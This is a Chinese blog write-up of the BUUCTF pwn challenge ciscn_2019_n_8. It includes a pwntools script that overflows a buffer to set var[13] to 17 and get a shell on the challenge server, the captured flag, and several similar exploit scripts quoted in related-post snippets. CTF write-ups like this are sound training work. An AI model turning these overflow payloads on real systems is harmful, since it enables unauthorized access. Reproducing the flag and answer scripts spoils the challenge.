[buuctf]ciscn_2019_n_8

最新推荐文章于 2024-04-14 22:13:54 发布
最新推荐文章于 2024-04-14 22:13:54 发布
阅读量434 收藏 1
点赞数
分类专栏: PWN # buuctf 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_71081503/article/details/125357930
版权
buuctf 同时被 2 个专栏收录
32 篇文章 0 订阅
订阅专栏
PWN
30 篇文章 2 订阅
订阅专栏

ciscn_2019_n_8

解析

先checksec一下,发现保护全开。
在这里插入图片描述
稍微有些迷茫,之后拖入ida中查看,发现逻辑是这样的。
在这里插入图片描述
要存在这个var13的值,之后要这个值等于17的情况下,会跳转到/bin/sh所以大概懂了,如果想要前面要填充0-13的var,那么需要a * (13*4)个之后加一个17之后因为是qword,所以需要在后面用0填一下,所以脚本大概成型。

脚本

from pwn import *
context(os = 'linux',arch = 'i386',log_level = 'debug')
p = remote('node4.buuoj.cn',28239)
#p = process('ciscn_2019_n_8')
payload = b'a' * (13*4) + p32(17) + p32(0)
p.recv()
p.sendline(payload)
p.interactive()

最后flag是flag{40a7b09f-a57d-4812-b888-d22d623b59c3}

逆向萌新
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
ciscn_2019_n_8 buuctf
XDiku的博客
01-21 605
ciscn_2019_n_8
ctf【ciscn_2019_n_8】
HUANGliang_的博客
10-29 213
缓冲区溢出漏洞
buuctfciscn_2019_n_8
weixin_54452942的博客
04-12 449
两个方法解题
ciscn_2019_n_8【BUUCTF
qq_41696518的博客
08-26 312
ciscn_2019_n_8
ciscn_2019_n_8题解
OrientalGlass的博客
01-08 213
是以&var[13]为起始地址的八个内存单元,由于是小端存储,所以覆盖要使得v[13]=0,v[14]=17。很显然输入字符串覆盖var数组里的值满足要求即可。1.checksec查看,保护全开感觉不妙。3.程序逻辑并不复杂,脚本很简单。2.ida打开查看程序。
ciscn_2019_n_8
xieyichensss的博客
04-07 489
最近做题好少啊,感觉堆好难啊。 废话不多说了,这是我做过的挺简单的一个题了。 1.拿到文件,直接file,发现保护基本全开,心里一凉,然后拖入ida。 2.发现是个很简单的栈溢出,如果var数组的第14个参数为0x11,即可调用system(’/bin/sh’)。 而又有scanf函数,且第一个参数为var数组的首地址。 3.exp from pwn import * context.os=‘linux’ context.arch=‘i386’ context.log_level=‘debug’ #sla=
get_started_3dsctf_2016|get_started_3dsctf_2016
12-11
网络安全逆向PWN题目,简单的栈溢出,虽然有后门函数,但同时又给了一定的限制条件,可以使用更复杂的ROP解法。该样本题解:https://blog.csdn.net/A951860555/article/details/111030289
BUUCTF逆向前八题
01-24
内容为BUUCTF里reserve的前八题自己的一些解题思路
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
BUUCTF】web之强网杯2019随便注
12-14
开始注入: 1’ : 报错 1’ #:回显正常 1’ order by 1 #: 正常(经测试列数为2–此处小白暗自窃喜) 1’ union select 1,2#: 回显 如图 看来此方法是行不通了,但经过苦苦寻求,了解到了堆叠注入: ...
BasicASM.s(BUUCTF
06-04
分析过程文件
ciscn_2019_n_3
12-30
ciscn(全国大学生信息安全竞赛),2019年的一道题目,涉及到fastbin堆漏洞的利用。由于调用了system函数,所以漏洞利用的难度不大,推荐初学者练习。题解链接:https://blog.csdn.net/A951860555/article/details/111991072
BUUCTF ciscn_2019_n_8
、moddemod
06-11 376
exp from pwn import * context.log_level = 'debug' proc_name = './ciscn_2019_n_8' p = remote('node3.buuoj.cn', 26801) # p = process(proc_name) payload = 'a'.encode() * 13 * 4 + p64(17) p.sendline(payload) p.interactive()
BUUCTF-PWN-ciscn_2019_n_8
Henlenl的博客
05-18 207
文章目录查看文件信息IDA 分析exp 查看文件信息 checksec 一下,保护还开的挺满 canary(栈保护),nx(堆栈不可执行),PIE(地址随机化) IDA 分析 其实我们应该nc 连一下的查看远程程序运行情况 丢入 32位IDA分析一下 很显然 程序的意思就是让 var[13] == 17就能拿到shell了 exp from pwn import * r = remote('node3.buuoj.cn',27168) #r = process('./ciscn_2019_n_8')
buuctf——ciscn_2019_n_8
qq_41560595的博客
03-21 518
查看权限 开了好多权限 查看源代码 分析 观察,var数组是int类型,在内存中占了4个字节。输入一个字符串,令var[13]处的值是17,且这个值占4个字节,就能拿到shell。 var中每一个元素占4个字节,payload必须构造成"A"*13才能将前13个位置占满。第14个位置要求是4字节,就要用p64打包。 解题代码 from pwn import * #p=process("./ciscn") p=remote("node3.buuoj.cn",25337) payload=b'AAAA'*
[BUUCTF]PWN13——ciscn_2019_n_8
mcmuyanga的博客
08-29 517
[BUUCTF]PWN13——ciscn_2019_n_8 题目网址:https://buuoj.cn/challenges#ciscn_2019_n_8 步骤: 例行检查,32位,保护开的挺多,canary(栈保护),nx(堆栈不可执行),PIE(地址随机化) nc一下,看看程序大概的执行情况 32位ida载入,shift+f12查看程序里的字符串,看到了system和bin/sh 双击跟进,ctrl+x查看哪里调用了这个字符串 很简单的一个程序,一开始让我们输入name,之后只要var[13]=
[BUUCTF] ciscn_2019_n_8
最新发布
Lucien_Carr的博客
04-14 230
这道题非常简单(甚至比ret2text简单...),只需要满足让系统调用system函数的条件,即将var[13]这个数组里全部填上17即可。checksec --file='filename' # filename为下载文件的自定义名称。观察选择条件,只需要满足var[13] = 17就可以。前面有scanf函数,可以直接向var数组输入。开了canary、NX和PIE,似乎防得很严实。主函数里就调用了system函数,运气很好。32位程序,放到IDA中继续分析。攻击成功,运行结果如下。
buuctf luky_guy
09-28
Luky库是一组抽象复杂操作的Java类,它提供了各种功能,包括网络...根据提供的引用内容,无法直接了解到buuctf luky_guy的具体信息。如果您能提供更多关于buuctf luky_guy的背景信息,我可以尝试为您提供更准确的答案。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

逆向萌新

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值